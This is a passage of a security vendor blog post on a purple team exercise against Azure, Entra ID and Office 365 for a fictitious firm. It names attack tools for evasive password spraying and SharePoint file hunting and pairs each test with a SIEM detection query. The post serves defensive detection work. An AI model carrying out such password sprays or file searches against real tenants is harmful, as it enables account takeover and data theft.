{"id":4583,"date":"2023-09-28T07:00:00","date_gmt":"2023-09-28T07:00:00","guid":{"rendered":"http:\/\/www.sumologic.com\/blog\/azure-cloud-purple-team"},"modified":"2026-03-23T11:11:28","modified_gmt":"2026-03-23T19:11:28","slug":"azure-cloud-purple-team","status":"publish","type":"blog","link":"https:\/\/www.sumologic.com\/blog\/azure-cloud-purple-team","title":{"rendered":"How to execute an Azure Cloud purple team exercise"},"content":{"rendered":"\n<section class=\"e-stn e-stn-0d652506f82b000a392973813b918ee25d5b4211 e-stn--glossary-inner-content e-stn--table-of-content\"><div class=\"container\">\n<div class=\"wp-block-b3rg-row e-row row\">\n<div class=\"wp-block-b3rg-column e-col e-col-1f7b3997080fc292474d26ff00c905d99d3520fa e-col--content-wrapper  col-sm-12 col-lg-12 col-xl-12\">\n<div class=\"e-div e-div-a1b32f66e1749758df41d5aea14f647cd10e362c e-div--card-btn-link\"><div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1400\" height=\"400\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Threat_Azure_blog_700x200.png\" alt=\"Threat_Azure_blog_700x200\" class=\"wp-image-4553\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-8eb94b7647adb4a91a0a6ddba7c6f9a2\">For folks who are responsible for threat detection of any kind for their organizations, the cloud can often be a difficult area to approach.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c1a34aeb721a04eb680479d853bc81c0\">At the time of writing, Amazon Web Services contains over two hundred services, while the Azure cloud offers six hundred.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f227bcd5b5ae99f50cf4ebf3bf0c82b9\">Each of these services can generate 
unique <a href=\"https:\/\/www.sumologic.com\/glossary\/telemetry\/\" target=\"_blank\" rel=\"noopener\">telemetry<\/a> and each surface can present defenders with a unique attack path to handle. Adding to this complexity is the diversity of cloud workload configurations, as well as varying architecture models.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d9a1a541e3874756e2169582c26bd7a1\">How do we, as protectors of the enterprise, begin to tackle visibility and threat detection use cases for these types of environments?&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c42e81a6491490354409c15c85a2a045\"><a href=\"https:\/\/www.sumologic.com\/blog\/threat-labs-kubernetes-home-lab\/\" target=\"_blank\" rel=\"noopener\">In previous blog posts<\/a>, we have outlined what purple teaming is and why it\u2019s a powerful tool to bring to bear in your enterprise. Now, let\u2019s continue this theme and cover how to apply the purple teaming concept to a Microsoft Entra\/Microsoft Azure environment which consists of compute, identity and productivity components.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-b5464c203c261a964f1947799fad8165\" id=\"why_purple_team_the_cloud?\">Why purple team the cloud?<\/h2>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-37d600ddd03c167a51d6fa13e10d3d1c\">As noted in the introduction to this post, the Azure cloud is associated with hundreds of services.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9aa8afae4de7f74199a93892a7ba06c8\">Complicating this is the fact that the Azure cloud provides mechanisms for identity management via Microsoft Entra, compute options via Microsoft Azure, as well as various productivity services via Office 365.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color 
has-link-color wp-elements-40fd1b352ee7a49caba558df156266ec\">Each of these three \u201cpillars\u201d has a unique set of telemetry and use cases tied to it, with various attack surfaces. In addition, from a threat actor point of view, the tradecraft necessary to meet objectives will no doubt differ depending on which component or service is being attacked or targeted.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-325e0f28fc803d99a9092cabc6bfdca5\">In this context, a purple team can be a valuable exercise that can be executed on an Azure cloud environment.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-f28f15761bc930dc93cdb7ca50bb8a70\">It is difficult to start from scratch in this regard, so let\u2019s briefly mind map the following broad areas of purple teaming in the context of the Azure cloud: planning, desired outcomes, areas of focus and finally, pitfalls. <strong><br><\/strong><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"838\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Why-purple-team-the-cloud.png\" alt=\"Why purple team the cloud\" class=\"wp-image-4554\" title=\"\"><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-3141a30ba8cc22027b189471b1d46d6e\" id=\"tactics,_techniques_and_procedures_selection\">Tactics, techniques and procedures selection<\/h2>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-189520edca137d3da833db9c24485ac7\">Let\u2019s apply this approach to a fictitious organization named FakeORG that utilizes the following Azure cloud services:<\/p>\n\n\n\n<ul>\n<li>Entra ID for identity management<\/li>\n<li>Office 365 for email and collaboration via Teams and SharePoint<\/li>\n<li>An Azure subscription that is running various virtual 
machines<\/li>\n<li>An Azure Kubernetes cluster for a containerized workload&nbsp;<\/li>\n<li>Azure DevOps for their development and release pipelines&nbsp;<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-57127f0240500c8c971fca1f22612fd8\">This organization believes they have the necessary telemetry for all the above services and workloads coming into their<a href=\"https:\/\/www.sumologic.com\/guides\/siem\" data-type=\"resource\" data-id=\"3026\"> SIEM<\/a> platform and want to purple team this environment in order to test their assumptions, discover gaps and create threat detection rules in order to wrangle malicious activity.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-37154f34d818bce4ddb856f315f53f0b\">After examining existing incidents and looking through a few threat intel reports, the team decides that the following techniques will be executed during the purple team exercise: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"617\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Tactics-techniques-and-procedures-selection.png\" alt=\"Tactics, techniques and procedures selection\" class=\"wp-image-4555\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c26f4f7159ffeaa5611437d06967bb6c\">These tactics, techniques and procedures cover identity, compute, containerized environments as well as developer paradigms and will provide a good starting point for future purple team efforts.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d2be87968875cfbd80ff871abb215feb\">The participants of the purple team exercise have also agreed to keep notes on each of the executions, in the following 
format:&nbsp;<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u2013<\/td>\n<td>\u2013<\/td>\n<td>\u2013<\/td>\n<td>\u2013<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e1e2e5dc9938f85ef2fa9533d9b0a03d\">The team has now chosen which techniques to replicate in the environment, has confirmed that the necessary access is in place and has also settled on a note-taking format.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-ac347b75e1151bf01a1ec8d8a190aa67\">Now the fun begins! The chosen tactics, techniques and procedures need to be executed within the environment while an eye is kept on the relevant telemetry on the other end.<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-40f794f89f29524f35dc518d8d9a801e\" id=\"purple_teaming_entra_id\">Purple teaming Entra ID<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-9c21aeff4e863d6aa2e69e0b29f29bee\" id=\"password_spray\">Password Spray<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-588f9898925423d55c40f3816378b189\">Password spraying is a critical area to wrap detective and preventive controls around, and FakeORG engineers have had to deal with a number of attacks on their environment that began with a password spray attempt.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5b9ab967a620df9e8db2f9d44293b475\">It makes sense then, that our FakeORG security engineers have decided to execute this technique during their purple team exercise.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color 
wp-elements-bf6db3130830451ed6e6789d3335e623\">In order to perform this password spray attack, they will be using the popular <a href=\"https:\/\/github.com\/knavesec\/CredMaster\" target=\"_blank\" rel=\"noopener\">CredMaster<\/a> tool.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-968f9190aa68cc77ce93e588c4160346\">The execution of this technique will look something like:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"928\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Password-Spray.png\" alt=\"Password Spray\" class=\"wp-image-4556\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-47ed1bd7c95cc5458a4a4c640cd5142d\">In typical password spray attacks, FakeORG engineers would be looking for failed authentication requests to multiple accounts coming from the same source IP address.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-03eeac4e4a8feb3d8155dee62e5497f7\">However, the CredMaster tool throws them a bit of a curve ball:&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2e5126be23e62bf92c09bc0774964242\"><em>\u201cLaunch a password spray \/ brute force attack via Amazon AWS passthrough proxies, shifting the requesting IP address for every authentication attempt. 
<\/em><strong><em>This dynamically creates FireProx APIs for more evasive password sprays.\u201d<\/em><\/strong><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b30ee08db2ef815e62f2ba7d375d1488\">The key point here is that each authentication request has a new IP address associated with it, as a new AWS API Gateway is spun up dynamically.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-30c8c2610c11dd1a9bdbdbea83535d0d\">It is quickly discovered that existing password spray detections fail to capture this activity, as these detections rely on the failed authentication requests stemming from a single IP address.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b435d9a876df85e311275918c8a77efd\">This is a great example of why purple teaming is an excellent tool for getting to the \u201cground truth\u201d of threat detection posture. The FakeORG engineers have at this point discovered a bit of a gap in their detection.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-13fd71149759e0823eadc4ec0345da7f\">The engineers brainstorm a little and discover that AWS provides a list of API Gateway IP ranges, so they craft a one-liner to grab these IP prefixes: <br><\/p>\n\n\n\n<pre>curl -s https:\/\/ip-ranges.amazonaws.com\/ip-ranges.json | jq '.prefixes[] | select(.service == \"API_GATEWAY\") | {ip_prefix} | join(\" \")'\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-4b0388bf79afb99b49b1ba6fa0301488\">Following the <a href=\"https:\/\/help.sumologic.com\/docs\/cse\/administration\/create-use-network-blocks\/#network-blocks-and-enrichment-fields\" target=\"_blank\" rel=\"noopener\">relevant Cloud SIEM documentation<\/a>, the engineers take the output of the above command and craft a CSV file with the following format:<\/p>\n\n\n<div class=\"e-img \">\n<figure 
class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1308\" height=\"622\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Cloud-SIEM-instance.jpg\" alt=\"Cloud SIEM instance\" class=\"wp-image-4557\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-eea2e381a34443605cfd12749b9d9515\">and proceed to upload it to their Cloud SIEM instance:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"472\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Entra-ID.jpg\" alt=\"Purple teaming Entra ID\" class=\"wp-image-4558\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-e16bffca65a6592a37a9de07c2cc7c00\">Now, any record ingested into their Cloud SIEM instance that matches the IP range discovered above will be labeled with&nbsp; \u201cAWS_API_Gateway\u201d &#8211; the team can now utilize their logs and craft detections using the following logic:<\/p>\n\n\n\n<ul>\n<li>Look at only authentication failures<\/li>\n<li>Look at IP addresses with the \u201cAWS_API_Gateway\u201d label<\/li>\n<li>Timeslice the data by an appropriate amount of time<\/li>\n<li>Look for multiple authentication failures within the allotted time slice<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-51b9a12304c94e81dfafeb31bcead79e\">In query form, this would look like:<\/p>\n\n\n\n<pre>_index=sec_record_authentication\r\n| where device_ip_location = \"AWS_API_Gateway\"\r\n| where !success\r\n| timeslice 10m\r\n| count_distinct(device_ip) as ip_addresses,values(user_username) as usernames, values(srcDevice_ip) as source_ips,values(application) as applications by _timeslice\r\n| where ip_addresses &gt; 1\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color 
<br>">
wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-5cd49dad2a59715e991428ff14e9d8aa\">And the results: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"368\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/AWS-API-Gateway.jpg\" alt=\"AWS API Gateway\" class=\"wp-image-4559\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-544a55c6c8ff2049d04d832edfe024d5\">During prototyping, it is noted that when timeslicing the data into 10-minute intervals, two authentication failures stemming from the AWS API Gateway are observed in each of those time blocks, which could be indicative of password spray attacks from tools that utilize the API Gateway for IP rotation purposes.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"mfa_device_registration\">MFA device registration<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-2a68270b154afa330f9d0dc29227a3cb\">Moving on to the next test, the team at FakeORG has read many threat intelligence reports outlining attack flows whereby threat actors register a new multi-factor authentication device in Entra\/Azure AD.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-23299f1b408d9d053e866a216182cef5\">The test for this is relatively straightforward: it is decided to create a new temporary account, register an MFA device for the account, and then browse to aka.ms\/mfasetup and register a new MFA device for this account.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d902d9f069475a4768f267ecc4b4a67b\">In this instance, an alert every time an MFA method is changed is deemed unnecessary. 
However, it is decided that this execution should be discovered in the logs, as this would be a critical aspect to check if an account were to bubble up as compromised.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-690d2f4001674339d31072913b14a138\">The following query is crafted:<\/p>\n\n\n\n<pre>_index=sec_record_audit cloud_provider = \"Azure\" action = \"Update user\"\r\n| %\"fields.modified_property_strongauthenticationphoneappdetail\" as new_device\r\n| %\"fields.properties.targetresources.1.modifiedproperties.1.oldvalue\" as old_device\r\n| targetUser_username as username\r\n| where !isnull(new_device) \r\n| where !isnull(old_device)\r\n| json field=new_device \"DeviceName\" as new_device_name \r\n| json field=old_device \"[0].DeviceName\" as old_device_name \r\n| fields username,action,new_device_name,old_device_name\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-de94b1b1cae69bf2dc466ca75cce1a4b\">And the results are returned:<\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"793\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/MFA-device-registration.jpg\" alt=\"MFA device registration\" class=\"wp-image-4560\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cecfc595013cd3b09020bcec392747e7\">In this case, the same MFA device was removed and added back in order to simulate the activity, but the underlying query logic works and this search is saved in order to be performed as part of broader incident response processes.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a043611653c440a1db6dd04804c85411\">For the Entra ID service, the notes are 
now:<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a48da9a41246289e0f22800a72fd44ce\">Very cool! 
The team can now start to see the purple team exercise taking shape and delivering value, with three executions completed, a new detection crafted and some searches created &#8211; the team keeps going and shifts gears a little bit towards Office 365.<\/p>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-566dd193e9023b80f21efcbf93b6063c\" id=\"purple_teaming_office_365\">Purple teaming Office 365<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-ceb8836599d0720fef3d76dc4e62a7ea\" id=\"sharepoint_exfiltration\">SharePoint exfiltration<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-cf5a087fb6ef379afe349c7cbdafe1a6\">In this test, the team will attempt to determine if they can see when a user performs sensitive searches for documents found on SharePoint sites, and then proceeds to download these same sensitive documents. <br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-6f11b4cec6eaea5fd125fbd477ab281a\">For this test, the <a href=\"https:\/\/github.com\/nheiniger\/SnaffPoint\" target=\"_blank\" rel=\"noopener\">SnaffPoint<\/a> tool will be utilized.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-654b67cb309e4c321a8b377bc3663c07\">The tool is executed and, sure enough, it finds a document containing the keyword search of \u201cpasswords\u201d &#8211; a test account is utilized in order to view and download the document. 
<br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"780\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Purple-teaming-Office-365.jpg\" alt=\"Purple teaming Office 365\" class=\"wp-image-4561\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-7ddcfbbd66b64ab10513a87cc090c24c\">The team starts to dig through the available SharePoint telemetry and sees various operations pertaining to this file, including the file being accessed as well as the search query being performed.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-9679819401d8d6ef8d7cbe6e8525658e\">In isolation, these events are interesting but do not paint a behavioral picture &#8211; something is needed to glue the events together in a logical fashion.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b404ddf0b3ba8dcb6ed2dd787450d947\">After some tinkering, it is decided that a qualifier-type query would probably be the best approach &#8211; the query itself ends up looking like:&nbsp;<\/p>\n\n\n\n<div>\n<pre>_index=sec_record_audit resource=SharePoint\r\n\r\n\r\n| 0 as score\r\n| \"\" as messageQualifiers\r\n| \"\" as messageQualifiers1\r\n| \"\" as messageQualifiers2\r\n| \"\" as messageQualifiers3\r\n\r\n\r\n| timeslice 1h\r\n\r\n| %\"fields.SourceFileName\" as source_file_name\r\n\r\n| contains(file_basename,source_file_name) as file_searchdl_compare\r\n\r\n| if (%\"fields.searchquerytext\" matches \/(password)\/, concat(messageQualifiers, \"Sensitive SharePoint Search Performed: \",%\"fields.searchquerytext\", \"n# score: 300n\"),\"\") as messageQualifiers \r\n\r\n| if (action matches \/(FileAccessed)\/, concat(messageQualifiers1, \"SharePoint File Access: \",source_file_name, \"n# score: 300n\"),\"\") as messageQualifiers1\r\n\r\n| if (action matches 
\/(FileDownloaded)\/, concat(messageQualifiers2, \"SharePoint File Downloaded: \",file_basename, \"n# score: 300n\"),\"\") as messageQualifiers2\r\n\r\n| if(file_searchdl_compare, concat(messageQualifiers3, \"File Search and Access Match\",\"n# score: 300n\"),\"\") as messageQualifiers3\r\n\r\n| concat(messageQualifiers,messageQualifiers1,messageQualifiers2,messageQualifiers3) as q\r\n\r\n| parse regex field=q \"score:s(?&lt;score&gt;-?d+)\" multi \r\n\r\n| where !isEmpty(q) \r\n\r\n| values(q) as qualifiers,sum(score) as score by user_username,_timeslice\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a409eb6143c54436901dd8550fc1f7e3\">This query is:<\/p>\n\n\n\n<ul>\n<li>Timeslicing the data by an hour<\/li>\n<li>Looking at whether two fields from a FileAccessed and FileDownloaded event match &#8211; that is, we would like to know if a user searched for and then downloaded a file of the same name<\/li>\n<li>Looking for a FileAccessed and FileDownloaded event<\/li>\n<li>Assigning a score to each of the above qualifiers&nbsp;<\/li>\n<li>Summing the score based on the timeslice and user name performing the actions&nbsp;<\/li>\n<\/ul>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-be90c39ae6fedf5fd5837f6a0c8640f0\">The returned results are extremely interesting and look something like the following: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"882\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/SharePoint-exfiltration.jpg\" alt=\"SharePoint exfiltration\" class=\"wp-image-4562\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-fe5c5911d60acdd03fbfb4cd3edac3e7\">Here, we see two distinct results side by side, each broken down by the configured time slice, and the result on the left hand side has a score of 12,600 whereas 
the result on the right has a score of 18,600.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-af7b4091119c9db95553196a92f84d74\">The reason why the event on the right side is scoring higher is that it contains a qualifier for the user in question actually downloading the file that was queried and accessed. In other words, the execution chain on the left side tells you that someone may have performed a SharePoint query containing sensitive keywords and may have accessed a file containing sensitive keywords or information, but did not download this file.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a9e423fa747c2573316f320823b8165b\">The team now has various options for tweaking these qualifiers to suit their environment and can run this search on a schedule to bubble up an alert when the score exceeds a certain threshold.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-f811e6358ef9f296cda78ac4b059f4af\" id=\"teams_phishing\">Teams phishing<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-a35da828cf5c48db54a535a9297becb3\">After looking at SharePoint, the team <a href=\"https:\/\/www.darkreading.com\/vulnerabilities-threats\/microsoft-teams-attack-phish-deliver-malware-directly\" target=\"_blank\" rel=\"noopener\">reads an article<\/a> that describes an attack flow whereby a misconfigured Teams tenant could potentially allow guest users to message users within an organization and send files that could be used for phishing attacks.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-81f3efc4b880cd71c0cd7bb7c32dc21e\">Current configurations are checked and it is discovered that currently, the organization is not affected by this misconfiguration, and the Teams tenant has external access disabled. 
However, since this setting can be modified, an alert that looks for this modification is desired.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-d725dd7364b2ef480348326ff97ced01\">The operation is performed in the tenant, and the logs are monitored.&nbsp;<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-c322b91ad13fc3340d62bb9d4a1f568d\">The following Cloud SIEM rule is crafted: <br><\/p>\n\n\n\n<pre>metadata_product = \"Office 365\"\r\nand action = \"TeamsAdminAction\"\r\nand lower(commandLine) matches \/(tenantfederationsettings\/configuration\/global)\/\r\nand fields[\"ModifiedProperties.1.Name\"] = \"AllowFederatedUsers\"\r\nand fields[\"ModifiedProperties.1.NewValue\"] = true\r\n<\/pre>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-190c051facb6c8a1bac3c4a1d05854d2\"><br><\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-241189eee0bc25887bede02f1694200c\">Once the test is performed again, a relevant <a href=\"https:\/\/help.sumologic.com\/docs\/cse\/records-signals-entities-insights\/\" target=\"_blank\" rel=\"noopener\">Signal<\/a> is generated: <br><\/p>\n\n\n<div class=\"e-img \">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1999\" height=\"1513\" src=\"http:\/\/www.sumologic.com\/wp-content\/uploads\/Teams-phishing.jpg\" alt=\"Teams phishing\" class=\"wp-image-4563\" title=\"\"><\/figure>\n<\/div>\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-b9cf9576ea8f81f38ec714f418615eac\">Now when a Teams organizational setting to allow external guest access is enabled, a Signal is generated that can be actioned and investigated.<\/p>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-4873e90f063084642f1153610f9b83cf\">Now the notes 
read:<\/p>\n\n\n\n<div>\n<table>\n<tbody>\n<tr>\n<td><strong>TTP<\/strong><\/td>\n<td><strong>Replication Steps<\/strong><\/td>\n<td><strong>Required Data Source<\/strong><\/td>\n<td><strong>Existing Detection?&nbsp;<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>No<\/td>\n<\/tr>\n<tr>\n<td>Password Spray Entra ID &#8211; 2nd Attempt<\/td>\n<td>Password spray via CredMaster<\/td>\n<td>Azure AD \/ Entra ID Sign In Logs<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Register MFA Device<\/td>\n<td>Browse to aka.ms\/mfasetup, log in with the relevant user account and follow prompts to register a new multi-factor authentication device.<\/td>\n<td>Azure AD \/ Entra ID Audit Logs, UserManagement Category<\/td>\n<td>Real-time detection deemed unnecessary, search created and saved<\/td>\n<\/tr>\n<tr>\n<td>SharePoint Exfiltration<\/td>\n<td>Create test SharePoint site, run SnaffPoint to search for a sensitive file and then download the file<\/td>\n<td>Office 365 logs, SharePoint operations<\/td>\n<td>Detection crafted<\/td>\n<\/tr>\n<tr>\n<td>Teams External Access Enabled<\/td>\n<td>Browse to Office admin portal, enable external access to Teams<\/td>\n<td>Office 365, TeamsAdminAction<\/td>\n<td>No, Cloud SIEM Signal created for enablement of external Teams guest access<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-a5009047cd4fb0c47beb4c23cb0b5527\" id=\"purple_teaming_azure_virtual_machines\">Purple teaming Azure Virtual Machines<\/h2>\n\n\n\n<h3 class=\"wp-block-heading has-eigengrau-color has-text-color has-link-color wp-elements-86d5efb6e73b4b0a4e6f397caabae2b9\" id=\"vm_run_command\">VM run command<\/h3>\n\n\n\n<p class=\"has-delft-blue-color has-text-color has-link-color wp-elements-991b3fd85c6e6e2e7f4c60f91cbcdf7f\">Prior to performing the purple team exercise, 
